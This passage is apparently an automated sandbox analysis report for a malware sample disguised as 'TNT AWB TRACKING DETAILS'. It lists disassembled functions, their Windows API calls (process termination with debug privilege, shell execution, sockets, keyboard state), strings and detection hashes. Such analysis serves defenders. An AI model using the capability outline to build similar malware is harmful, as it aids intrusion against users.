Part of subcall function 00AF710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?), ref: 00AF7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B19806
_memset.LIBCMT ref: 00B19813
_memset.LIBCMT ref: 00B19956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00B19982
CoTaskMemFree.OLE32(?), ref: 00B1998D

Strings

NULL Pointer assignment, xrefs: 00B199DB

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: b8de839089f247ab038e40ef1dc45aec7980efb26974909351c3237288f9b836
Instruction ID: 91c3df793b341d5142f0f18bd9e42f7a98132ab76d1e2785043ba839d3e31f22
Opcode Fuzzy Hash: b8de839089f247ab038e40ef1dc45aec7980efb26974909351c3237288f9b836
Instruction Fuzzy Hash: 09914871D00229EBDB10DFA4DD91EDEBBB9EF09350F10416AF519A7291DB31AA44CFA0

Function 00B26D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B26E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00B26E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B26E52
_wcscat.LIBCMT ref: 00B26EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00B26EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B26EF2

Strings

SysListView32, xrefs: 00B26DF6

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 248ca4442a89551f4d4bbab62472a5fabe3ef87a5a1629563f61bcadb3a6ea2e
Instruction ID: 82ecd6a76f1ef51b5bdea443157e9e8b8b47a72145594dfb3a6e2505e64bfaad
Opcode Fuzzy Hash: 248ca4442a89551f4d4bbab62472a5fabe3ef87a5a1629563f61bcadb3a6ea2e
Instruction Fuzzy Hash: 0A41C070A00319ABEB219F64DC85FEE77F8EF08350F1008AAF588E7291D6719D84CB60

Function 00B1E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00B03C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00B03C7A
Part of subcall function 00B03C55: Process32FirstW.KERNEL32(00000000,?), ref: 00B03C88
Part of subcall function 00B03C55: CloseHandle.KERNEL32(00000000), ref: 00B03D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1E9A4
GetLastError.KERNEL32 ref: 00B1E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B1EA63
GetLastError.KERNEL32(00000000), ref: 00B1EA6E
CloseHandle.KERNEL32(00000000), ref: 00B1EAA3

Strings

SeDebugPrivilege, xrefs: 00B1E9C2

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: daf6c4de40b6a0af9bab247be642dec14f20483aa2043f7d3667e7f674ec69fd
Instruction ID: 8016ff6fd69dbe85291c0ca9c38c50e1fe44c81d48d0812b1e3a0e1818477f91
Opcode Fuzzy Hash: daf6c4de40b6a0af9bab247be642dec14f20483aa2043f7d3667e7f674ec69fd
Instruction Fuzzy Hash: 2441CC312002019FDB25EF54CD95FBEBBE5AF45714F4884A8FA029B2D2CB78E845CB95

Function 00B02F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00B03033

Strings

blank, xrefs: 00B02FB5
stop, xrefs: 00B03004
question, xrefs: 00B02FEC
info, xrefs: 00B02FD4
warning, xrefs: 00B0301C

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: c6d5495d3fd4444f16aed7a283d5b1cc6053ba38f7455e0e4648f22d870f495e
Instruction ID: 39ebc30e4dbb7596478b794f95067b5e58cd81ed9a95028e9a5cb5d158eca378
Opcode Fuzzy Hash: c6d5495d3fd4444f16aed7a283d5b1cc6053ba38f7455e0e4648f22d870f495e
Instruction Fuzzy Hash: C5110535249386BAE7159A14EC86F6B6FECDF25760B2000EAF900B61C1FAB05F4456A4

Function 00B042F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B04312
LoadStringW.USER32(00000000), ref: 00B04319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B0432F
LoadStringW.USER32(00000000), ref: 00B04336
_wprintf.LIBCMT ref: 00B0435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B0437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00B04357

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: edf4d0ab91f667a3b2aaf96554a28baeb8c8a68d3b0309533047f4e18815b992
Instruction ID: a566421f3ce1a7e88feae0a5998582c4a99f7ffbb4da0e4d567c2f60e32b0dc3
Opcode Fuzzy Hash: edf4d0ab91f667a3b2aaf96554a28baeb8c8a68d3b0309533047f4e18815b992
Instruction Fuzzy Hash: 550144F2900209BFD7219790DD89EF6777CE708701F4005B5B745E3051EA755E858B75

Function 00B2D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

GetSystemMetrics.USER32(0000000F), ref: 00B2D47C
GetSystemMetrics.USER32(0000000F), ref: 00B2D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B2D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B2D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B2D716
ShowWindow.USER32(00000003,00000000), ref: 00B2D735
InvalidateRect.USER32(?,00000000,00000001), ref: 00B2D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00B2D77D

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 28a5d376c8fc90da92190002e93c7e0052fa3588fd1c608e22d578aa55ab72b3
Instruction ID: ee80f467fa645f796ebc4e519938096fa4d124ab2d51daf4cbc2aaddad72e498
Opcode Fuzzy Hash: 28a5d376c8fc90da92190002e93c7e0052fa3588fd1c608e22d578aa55ab72b3
Instruction Fuzzy Hash: EEB16971600226ABDF15CF68D9C5BAD7BF1FF08711F0881A9EC489B2A5DB74AD50CB90

Function 00AA2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ADC1C7,00000004,00000000,00000000,00000000), ref: 00AA2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00ADC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00AA2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00ADC1C7,00000004,00000000,00000000,00000000), ref: 00ADC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ADC1C7,00000004,00000000,00000000,00000000), ref: 00ADC286

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 1e593b3bd7e7e35bc196d0d1f178b9250fe30e80ae4607923562202cb811a296
Instruction ID: 1cb31be82faf8031d74ca9a237564d943dd7bf74a65c76bc75fddc45221fc6f6
Opcode Fuzzy Hash: 1e593b3bd7e7e35bc196d0d1f178b9250fe30e80ae4607923562202cb811a296
Instruction Fuzzy Hash: 4041DA316087819BD7359B2C9D88B7B7BB2AF87350F54882EF047876E1CB759862D720

Function 00B070C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00B070DD

Part of subcall function 00AC0DB6: std::exception::exception.LIBCMT ref: 00AC0DEC
Part of subcall function 00AC0DB6: __CxxThrowException@8.LIBCMT ref: 00AC0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B07114
EnterCriticalSection.KERNEL32(?), ref: 00B07130
_memmove.LIBCMT ref: 00B0717E
_memmove.LIBCMT ref: 00B0719B
LeaveCriticalSection.KERNEL32(?), ref: 00B071AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B071BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00B071DE

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: f1c2479a567ee72968c925189672e60e375aec73754b0dab0dd0fc687e1d8be8
Instruction ID: a7e8961794b9a2b32a3e29aba2bfdfd72390e8298e43c66887afdc327b4a6919
Opcode Fuzzy Hash: f1c2479a567ee72968c925189672e60e375aec73754b0dab0dd0fc687e1d8be8
Instruction Fuzzy Hash: AF315D31900205EBDF10DFA4DD85EAEBBB8EF45710F1541B9F904AB296DB30AE15CBA0

Function 00B261D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B261EB
GetDC.USER32(00000000), ref: 00B261F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B261FE
ReleaseDC.USER32(00000000,00000000), ref: 00B2620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B26246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B26257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B2902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00B26291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B262B1

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 0224a02826286ac900df93e6c72a18985c3cd243b46fb18d48705d3122210dbf
Instruction ID: 8f7c5793c80e74ee06c1e3715029369a1ee9badb88dad7008e90c65525cebdee
Opcode Fuzzy Hash: 0224a02826286ac900df93e6c72a18985c3cd243b46fb18d48705d3122210dbf
Instruction Fuzzy Hash: F9314F72101214BFEB218F50DC8AFFB3BA9EF49765F044065FE089A191CA759C52CB64

Function 00AFBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00AFBBC4
_memcmp.LIBCMT ref: 00AFBBE6
_memcmp.LIBCMT ref: 00AFBBFE
_memcmp.LIBCMT ref: 00AFBC11
_memcmp.LIBCMT ref: 00AFBC2B
_memcmp.LIBCMT ref: 00AFBC3E
_memcmp.LIBCMT ref: 00AFBC56
_memcmp.LIBCMT ref: 00AFBC71

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 32f035bc69d1170f2b50949a3064b50622be9df8310d46e457f918371b4e5af0
Instruction ID: f9fec84e9c64bf159c5c4aa820505cb0031ba8b00097318df92aedf081fd70c6
Opcode Fuzzy Hash: 32f035bc69d1170f2b50949a3064b50622be9df8310d46e457f918371b4e5af0
Instruction Fuzzy Hash: CF219FB171120D7BA6086751DE42FBBB7BDDE19388F184024FE049A657EB64DE1282B1

Function 00B0EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

Part of subcall function 00ABFC86: _wcscpy.LIBCMT ref: 00ABFCA9

_wcstok.LIBCMT ref: 00B0EC94
_wcscpy.LIBCMT ref: 00B0ED23
_memset.LIBCMT ref: 00B0ED56

Strings

X, xrefs: 00B0ED93

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 5ea1283d305b0379f322add5d0708e7dd0015511efc70359f7f86ce156812aa3
Instruction ID: 689f814f0e1933f939db0aabf68a81b84a0a60a1594e71359e7e156ecc3453a8
Opcode Fuzzy Hash: 5ea1283d305b0379f322add5d0708e7dd0015511efc70359f7f86ce156812aa3
Instruction Fuzzy Hash: 9FC13C715083019FD764EF24C985A6BBBE4EF86310F04496DF8999B2E2DB30EC45CB92

Function 00B16B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B16C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B16C21
WSAGetLastError.WSOCK32(00000000), ref: 00B16C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00B16CEA
inet_ntoa.WSOCK32(?), ref: 00B16CA7

Part of subcall function 00AFA7E9: _strlen.LIBCMT ref: 00AFA7F3
Part of subcall function 00AFA7E9: _memmove.LIBCMT ref: 00AFA815

_strlen.LIBCMT ref: 00B16D44
_memmove.LIBCMT ref: 00B16DAD

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 5d04f3f1ea8330ca4856fc1840501ec491d939559c76bfccbe8ae2a46dba82a8
Instruction ID: 84029997eb9cd5db1ea1b456e78c36655725eaa0dd2bcdcdf94b373df1317b5e
Opcode Fuzzy Hash: 5d04f3f1ea8330ca4856fc1840501ec491d939559c76bfccbe8ae2a46dba82a8
Instruction Fuzzy Hash: 6581E171608200ABC710EB24DD82FABB7E8EF85714F50496CF9559B2E2DB70ED41CB52

Function 00AA1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e5e43ae8129e7b5831e2a7a859cad97ee7ab5c554f49184473776fef54f3af
Instruction ID: 573f68c2c3f76f874a132efbbb028c8a2b050cfa53f962fee7e72cbedb5c3363
Opcode Fuzzy Hash: f7e5e43ae8129e7b5831e2a7a859cad97ee7ab5c554f49184473776fef54f3af
Instruction Fuzzy Hash: 4F714A74904109FFCB148F98CC89ABEBB79FF8A310F148159F915AB291C734AA51CBA4

Function 00B2B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(013F5638), ref: 00B2B3EB
IsWindowEnabled.USER32(013F5638), ref: 00B2B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B2B4DB
SendMessageW.USER32(013F5638,000000B0,?,?), ref: 00B2B512
IsDlgButtonChecked.USER32(?,?), ref: 00B2B54F
GetWindowLongW.USER32(013F5638,000000EC), ref: 00B2B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B2B589

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 037772ab14c59670b2731b9a6d36f48251ad69cf57e0dc006fe592b187850c84
Instruction ID: 294834cd406a2b8c847ed82df04e67d14f5e58120f18d0ba03078a4f3cf4e6b5
Opcode Fuzzy Hash: 037772ab14c59670b2731b9a6d36f48251ad69cf57e0dc006fe592b187850c84
Instruction Fuzzy Hash: A271AE34600225AFDB35AF54E8D0FBA7BF5EF09300F1444A9EA59973A2CB31A951DB50

Function 00B1F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B1F448
_memset.LIBCMT ref: 00B1F511
ShellExecuteExW.SHELL32(?), ref: 00B1F556

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

Part of subcall function 00ABFC86: _wcscpy.LIBCMT ref: 00ABFCA9

GetProcessId.KERNEL32(00000000), ref: 00B1F5CD
CloseHandle.KERNEL32(00000000), ref: 00B1F5FC

Strings

@, xrefs: 00B1F525

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 2e0f60ba8e33b36030690d7babfdb9fff8f51ac5b4f5d21d571d46e2c7710ebc
Instruction ID: e64092058c7e3c780794d42120156718edfbfddfbdba91169d2cc1f0f399b069
Opcode Fuzzy Hash: 2e0f60ba8e33b36030690d7babfdb9fff8f51ac5b4f5d21d571d46e2c7710ebc
Instruction Fuzzy Hash: 6D619175A00619DFCF14DFA4C9819AEBBF5FF49310F5480A9E856AB391CB34AD41CB90

Function 00B00F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00B00F8C
GetKeyboardState.USER32(?), ref: 00B00FA1
SetKeyboardState.USER32(?), ref: 00B01002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00B01030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00B0104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00B01095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B010B8

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
